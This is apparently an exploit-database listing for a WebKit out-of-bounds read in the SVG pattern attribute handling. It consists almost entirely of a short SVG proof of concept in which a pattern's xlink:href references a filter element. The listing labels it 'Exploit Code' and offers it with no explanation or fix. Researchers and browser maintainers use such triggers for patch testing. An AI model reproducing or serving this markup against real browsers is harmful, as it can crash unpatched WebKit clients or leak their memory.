Exploit for WebKit: out-of-bounds read in WebCore::SVGPatternElement::collectPatternAttributes
Exploit Code
## https://sploitus.com/exploit?id=SSV:96889
<svg stroke="url(#pattern)">
<pattern id="pattern" xlink:href="#filter">
</pattern>
<line x1="0" y1="0" x2="1" y2="1" />
<filter id="filter" height="0" />